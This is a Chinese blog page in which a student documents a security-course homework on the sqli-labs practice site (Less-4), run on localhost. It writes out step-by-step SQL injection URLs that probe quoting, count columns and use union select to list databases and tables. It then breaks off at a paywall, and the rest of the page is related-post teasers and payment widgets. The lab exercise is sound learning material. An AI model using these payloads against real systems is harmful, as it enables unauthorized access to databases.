我的网安作业2/7

最新推荐文章于 2022-05-31 22:23:29 发布
最新推荐文章于 2022-05-31 22:23:29 发布
阅读量164 收藏
点赞数
分类专栏: wwp的网安之路 文章标签: 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44912000/article/details/113747668
版权
这篇博客详细记录了作者在sqli-labs的不同关卡中进行SQL注入攻击的过程,从判断注入点、查看数据库信息到获取用户信息。此外,还分享了在CTF挑战中解决Web、Misc和Crypto问题的思路,包括利用工具和编程技巧解密栅栏密码,最终获取flag。作者表示在学习过程中不断摸索,期待提升自己的技能。
摘要由CSDN通过智能技术生成

一、sqli-labs

less4:

打开less4的index.php文件,在SQL语句下添加如下两句:

echo $sql;
echo "<br>";

1.判断是否存在注入:

http://127.0.0.1/sqli/Less-4/?id=1
http://127.0.0.1/sqli/Less-4/?id=1'显式正确
http://127.0.0.1/sqli/Less-4/?id=1"显式不正确

得到报错信息:
在这里插入图片描述
根据报错信息构造正确的SQL语句:

http://127.0.0.1/sqli/Less-4/?id=1")--+

2.查看列数:

http://127.0.0.1/sqli/Less-4/?id=1") order by 3--+显示正常
http://127.0.0.1/sqli/Less-4/?id=1") order by 4--+显示不正常

得到列数为3
3.判断回显位置:

http://127.0.0.1/sqli/Less-4/?id=-1") union select 1,2,3--+

在这里插入图片描述

4.查看所有数据库:

http://127.0.0.1/sqli/Less-4/?id=-1") union select 1,2,group_concat(schema_name)from information_schema.schemata--+

在这里插入图片描述

5.查看security数据库的所有表:

http://127.0.0.1/sqli/Less-4/?id=-1") union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=0x7365637572697479--+

在这里插入图片描述

6.查看users表所有的列信息:


                

                
                
        

        

    

  


        

            

                    
                      最低0.47元/天 解锁文章
                        
                    
            

        

    

      

        

            

              
                
                  吴文佩
                
              
            

            

                关注
              
            

        

        

          
      

      

            

                专栏目录
          









                



	

		

			

				
					
CRC32爆破小结

				
			

			

				

					0verWatch的博客
				

				

					02-24
					
					3万+
					
				

			

		

		

			
				
前言

最近在bugku遇到了一道隐写题,binwalk之后发现里面有很多个压缩包。。。。。。然后就无从下手,于是查看别人大佬的wp才发现是CRC32爆破,由于本人第一次遇到这种题目,就记录一下吧。。



正文



CRC想必大家都知道,它的全称是循环冗余校验(Cyclic Redundancy Check, CRC),用来校验文件是否出错但并不能用于自动纠错。。emmmm,计组上课好像讲过,...

			
		

	



                

              
                



	

		

			

				
					
CRC32校验算法C语言版(查表法)

				
			

			

				

					weixin_30840253的博客
				

				

					05-16
					
					3656
					
				

			

		

		

			
				
最近用到CRC校验算法,就找了些资料,学习了一下,网上关于CRC32的资料也多,但感觉不是很完整,或者太高深。
CRC算法查表法很常见,但表是怎么来的,有些资料说得不很清楚。
我来说一下我的看法:
1.CRC校验变化太多,有CRC4/5/6/7/8/16/32,每一种的多项式也有很多种变化,并不是一成不变的;
2.输入输出方式也有区别,有一些初始值是0,有一些初始值是0xFFFFF...

			
		

	



                


  
              

                


	

		

			

				
					
CRC32概述以及实现和使用

				
			

			

				

					$好记性还是要多记录$
				

				

					05-31
					
					8468
					
				

			

		

		

			
				
CRC32概述以及实现和使用

			
		

	





	

		

			

				
					
CRC算法原理

				
			

			

				

					Hedia Pan的博客
				

				

					12-20
					
					3443
					
				

			

		

		

			
				
一、通讯校检
  在一个p位二进制数据序列之后附加一个r位二进制校检码,构成一个总长为p+r的二进制序列。附加在数据序列之后的这个校检码与p位二进制序列之间存在一个特定的关系,如果因干扰等原因使得数据序列中的一些位发生错误,这种特性的关系就会破坏。因此,可以通过检查该关系,实现对接收到的数据正确性的检验。

根据校检码与p位二进制序列之间的关系,可以将通讯校检方式分为:

a. 奇偶校检:每个字节的校检码与该字节(包括校检码)中1的个数对应;

b. 累加和校检:每个数据包的校检码为该数据包中所有数据...

			
		

	



		

			
		



	

		

			

				
					
我的网安作业2/21

				
			

			

				

					wwp的博客
				

				

					02-21
					
					116
					
				

			

		

		

			
				
一、SQL-labs
Less8
1.判断是否存在SQL注入
http://127.0.0.1/sqli/Less-8/?id=1


http://127.0.0.1/sqli/Less-8/?id=1'


由两次结果可知,存在SQL注入问题。
2.构造正确的SQL语句
http://127.0.0.1/sqli/Less-8/?id=1' --+


3.开始猜解表名
由于是布尔盲注,手动实在是太慢了,我觉得用burpsuite爆破都很麻烦,但是我自己的代码能力又很差,唉,彷佛看到了我的网安之路的终点

			
		

	





	

		

			

				
					
2023年四川大学网安学院操作系统期末考纲/题库

					
最新发布

				
			

			

				

					06-18
				

			

		

		

			
				
以上内容总结了四川大学网安学院2023年操作系统期末考纲中涉及的一些重要知识点,旨在帮助学生理解和掌握操作系统的基本概念和原理。希望考生能够通过复习这些内容,更好地准备即将到来的考试。

			
		

	





	

		

			

				
					
周玉川-2017221302006-网安技术第七次作业1

				
			

			

				

					08-08
				

			

		

		

			
				
周玉川同学的第七次作业主要探讨了入侵检测的分类、主要技术指标以及未知攻击检测方法,并提出了一个实践性的课后练习。  1. 入侵检测的分类:  - 异常检测模型(Anomaly Detection):这种模型依赖于对正常行为的...

			
		

	





	

		

			

				
					
周玉川-2017221302006-网安技术第三次作业1

				
			

			

				

					08-03
				

			

		

		

			
				
例如,本次作业中提到的口令检测程序就要求密码必须包含大写字母、小写字母、数字和特殊字符中的至少三种类型,并且长度限制在8到30个字符之间。  #### 实现方法  该检测程序使用了JavaScript中的正则表达式来实现这...

			
		

	





	

		

			

				
					
CRC 32 校验

				
			

			

				

					xuleisdjn的专栏
				

				

					05-19
					
					1万+
					
				

			

		

		

			
				
CRC即循环冗余校验码(Cyclic Redundancy Check[1] )。它是一类重要的线性分组码,编码和解码方法简单,检错和纠错能力强,在通信领域广泛地用于实现差错控制。  
今天上午看了crc,看的云里雾里,在这里记录一下crc 32的生成代码。
CRC-32的预置码表计算时要选取一个多项式作为除数,一般CRC-32选取如下三个多项式值中的一个 
Polynomial represent

			
		

	





	

		

			

				
					
0xffffffff是多少?

					
热门推荐

				
			

			

				

					天亮说晚安
				

				

					03-25
					
					6万+
					
				

			

		

		

			
				
(1)正数的补码与原码相同;
  (2)负数的符号位为1,其余位为该数绝对值的原码按位取反,然后整个数加1,即为其补码。   (总的来说:补码=原码取反+1,只不过负数带有符号位需特殊考虑。。。)
-----------------------------------------------------------------------------------------------------

			
		

	





	

		

			

				
					
CRC32学习总结

				
			

			

				

					Shawking的博客
				

				

					08-01
					
					6597
					
				

			

		

		

			
				
CRC32学习总结这几天一直在研究CRC相关的知识,本来通信网学习过相关的知识,但是比较浅。通过这几天的尤其是今天的学习,我对于CRC有了全新的认识。课本上主要着重介绍直接计算法,就是数据补零再和生成多项式做除法。这种方法利用循环来实现是比较容易的,但是在FPGA中,想要利用硬件的并发性来实现CRC的计算。最近一直在做网络协议栈相关的东西,所以开刀的对象就是CRC32了。上网找了很多相关博客,研究了

			
		

	





	

		

			

				
					
CRC32绕过RAR密码

				
			

			

				

					Hydra的博客
				

				

					10-20
					
					2万+
					
				

			

		

		

			
				
遇到一道题,加密了50位。。。。,所以,爆破果断舍弃



 事实上,rar的压缩文档中是提供一个CRC32的值,这个值是文档在压缩之前的CRC32值,相信很多人都知道:每个不同的文件都有唯一的一个CRC32值,就算是可能有重复的,那么在内容为1~49的这个小范围内的txt文本也不会有重复。



题目提示6位纯数字,上脚本,爆破。


#!/usr/bin/python
# -*- coding...

			
		

	





	

		

			

				
					
[CTF隐写]png中CRC检验错误的分析

				
			

			

				

					baikeng3674的博客
				

				

					07-03
					
					2926
					
				

			

		

		

			
				
[CTF隐写]png中CRC检验错误的分析

最近接连碰到了3道关于png中CRC检验错误的隐写题,查阅了相关资料后学到了不少姿势,在这里做一个总结


题目来源:

bugku-MISC-隐写2
bugku-MISC-再来一道隐写
JarvisOJ-MISC-炫酷的战队logo

基础知识:
​ 先分析png的文件格式,用16进制编辑器010editor打开一张...

			
		

	





	

		

			

				
					
CRC32 直接计算方法

				
			

			

				

					C821215的专栏
				

				

					10-31
					
					7846
					
				

			

		

		

			
				
 [ CRC32 计算方法 -- 直接计算法 ] ----这里不做什么技术性探讨为什么CRC32可以效应以及CRC32的原理。那不是我所关心的,我所关心的只是能否正确地使用它。CRC32 在网上有众多的POLY(也就是可以看成为种子一样的值)。WinRar 使用的是 0xedb88320。还有ISO标准的其他poly 值。这个值可以通过GOOGLE搜到很多。查表法很优秀,但要用掉无关痛痒的1K

			
		

	





	

		

			

				
					
Python API:crc32函数 计算CRC校验值

				
			

			

				

					Wang_PChao的博客
				

				

					02-27
					
					8721
					
				

			

		

		

			
				
函数原型

zlib.crc32(data[, value])

函数作用

首先说明一下python zlib库的作用,zlib模块为需要数据压缩的程序提供了一系列函数,用于压缩和解压缩。要使用这些函数,首先应 import zlib。zlib 库详细使用可以参考http://www.zlib.net/manual.html 版本说明:由于兼容性和安全性的问题,推荐使用 1.1.4 及以上版本的...

			
		

	





	

		

			

				
					
python 求crc32的值

				
			

			

				

					小驹的专栏
				

				

					05-25
					
					6966
					
				

			

		

		

			
				
CRC值 
前面要import binascii
binascii.crc32(v)  求出了v的crc32值,这是一个long型,形如-1456387L,把这个值&0xffffffff得到的值形如48a213L的形式。。。
然后把这个值用16进制表示出来


    #---------------------------------------------------------

			
		

	





	

		

			

				
					
关于mysql crc32和python crc32

				
			

			

				

					howard的技术之路
				

				

					06-07
					
					2049
					
				

			

		

		

			
				
binascii.crc32(data[
, crc])¶<br />Compute CRC-32, the 32-bit checksum of data, starting with an 
initial crc.  This
is consistent with the ZIP file checksum.  Since the algorithm is 
designed for
use as a checksum algorithm, it is not suitable for us

			
		

	





	

		

			

				
					
中职网安2.txt字典

				
			

			

				

					06-26
				

			

		

		

			
				
中职网安2.txt字典,是一个用于网络安全学习和研究的常用字典。该字典包含了一个网络攻击者可能会使用的密码、用户名、常用短语、钓鱼网站地址及恶意软件等信息,这些信息都能够帮助研究人员更好地理解攻击者的行为...

			
		

	



              




          




        



    





    



      

      

        
      

      





	

		
评论 3

	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值